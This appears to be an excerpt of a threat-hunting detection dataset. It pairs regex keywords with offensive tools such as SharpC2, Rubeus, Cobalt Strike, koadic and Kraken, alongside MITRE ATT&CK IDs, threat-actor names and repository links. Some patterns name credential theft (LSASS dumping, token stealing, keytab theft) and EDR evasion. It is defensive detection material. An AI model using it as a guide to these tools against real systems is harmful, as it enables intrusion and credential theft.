"*Commands/ExecuteAssembly.*",".{0,1000}Commands\/ExecuteAssembly\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38687"
"*Commands/KillProcess.*",".{0,1000}Commands\/KillProcess\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38688"
"*Commands/ListProcesses.*",".{0,1000}Commands\/ListProcesses\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38689"
"*Commands/Logonsession.*",".{0,1000}Commands\/Logonsession\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38690"
"*Commands/PowerShellImport.*",".{0,1000}Commands\/PowerShellImport\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38691"
"*Commands/Preauthscan.*",".{0,1000}Commands\/Preauthscan\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38692"
"*Commands/PrintWorkingDirectory.*",".{0,1000}Commands\/PrintWorkingDirectory\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38693"
"*Commands/PsExecCommand.*",".{0,1000}Commands\/PsExecCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38694"
"*Commands/RevToSelf.*",".{0,1000}Commands\/RevToSelf\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38695"
"*Commands/RunPe.*",".{0,1000}Commands\/RunPe\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38696"
"*Commands/SetSleep.*",".{0,1000}Commands\/SetSleep\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38697"
"*Commands/Shell.*",".{0,1000}Commands\/Shell\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38698"
"*Commands/ShInject.*",".{0,1000}Commands\/ShInject\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38699"
"*Commands/ShSpawn.*",".{0,1000}Commands\/ShSpawn\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38700"
"*Commands/Silver.*",".{0,1000}Commands\/Silver\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38701"
"*Commands/StealToken.*",".{0,1000}Commands\/StealToken\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38702"
"*Commands/StopDrone.*",".{0,1000}Commands\/StopDrone\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38703"
"*Commands/TakeScreenshot.*",".{0,1000}Commands\/TakeScreenshot\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38704"
"*Commands/WhoAmI.*",".{0,1000}Commands\/WhoAmI\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38705"
"*Commands/WinRmCommand.*",".{0,1000}Commands\/WinRmCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38706"
"*Commands/WmiCommand.*",".{0,1000}Commands\/WmiCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38707"
"*commixproject/commix*",".{0,1000}commixproject\/commix.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","38708"
"*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","38709"
"*common_passwords.txt*",".{0,1000}common_passwords\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","38710"
"*commonspeak_sublist.txt*",".{0,1000}commonspeak_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","38711"
"*communicate_as_backdoor_user.py*",".{0,1000}communicate_as_backdoor_user\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","38712"
"*comnap_##*",".{0,1000}comnap_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","38713"
"*comnode_##*",".{0,1000}comnode_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","38714"
"*Company'>Unam Sanctam</Data>*",".{0,1000}Company\'\>Unam\sSanctam\<\/Data\>.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","38722"
"*compile_implant*",".{0,1000}compile_implant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38723"
"*Compiling mstscax dll proxy*",".{0,1000}Compiling\smstscax\sdll\sproxy.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","38724"
"*Compiling proxy argon2.dll*",".{0,1000}Compiling\sproxy\sargon2\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","38725"
"*Complete log of pspy (may contain commands run in this test):*",".{0,1000}Complete\slog\sof\spspy\s\(may\scontain\scommands\srun\sin\sthis\stest\)\:.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","38726"
"*completedns-get-ns-history*",".{0,1000}completedns\-get\-ns\-history.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","38727"
"*COMPlus_ETWEnabled=0\0\0\0*",".{0,1000}COMPlus_ETWEnabled\=0\\0\\0\\0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38728"
"*compress_encode_obfs*",".{0,1000}compress_encode_obfs.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38729"
"*ComputerDefaultsUACBypass.lua*",".{0,1000}ComputerDefaultsUACBypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","38733"
"*ComputerDirectory\*.FullDump.txt*",".{0,1000}ComputerDirectory\\.{0,1000}\.FullDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","38734"
"*computerProps.DumpSMSAPassword*",".{0,1000}computerProps\.DumpSMSAPassword.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","38735"
"*comsvcs_lsass*",".{0,1000}comsvcs_lsass.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38743"
"*ComsvcsLSASS*",".{0,1000}ComsvcsLSASS.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38744"
"*Con7ext Shell V.2*",".{0,1000}Con7ext\sShell\sV\.2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","38745"
"*conda activate kraken*",".{0,1000}conda\sactivate\skraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","38746"
"*conda create -n kraken python=*",".{0,1000}conda\screate\s\-n\skraken\spython\=.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","38747"
"*config/51pwn/CVE-*",".{0,1000}config\/51pwn\/CVE\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","38748"
"*CONFIG_NETKIT_DEBUG*",".{0,1000}CONFIG_NETKIT_DEBUG.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","38749"
"*config_steal /etc/krb5.conf /etc/krb5.keytab*",".{0,1000}config_steal\s\/etc\/krb5\.conf\s\/etc\/krb5\.keytab.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","38750"
"*ConfigIni::GetInt(""""Server"""", """"SOCK5Port"""", 9090""*",".{0,1000}ConfigIni\:\:GetInt\(\""Server\"",\s\""SOCK5Port\"",\s9090\"".{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38751"
"*Confuser.CLI.Exe*",".{0,1000}Confuser\.CLI\.Exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","38752"
"*Confuser.CLI.exe*",".{0,1000}Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38753"
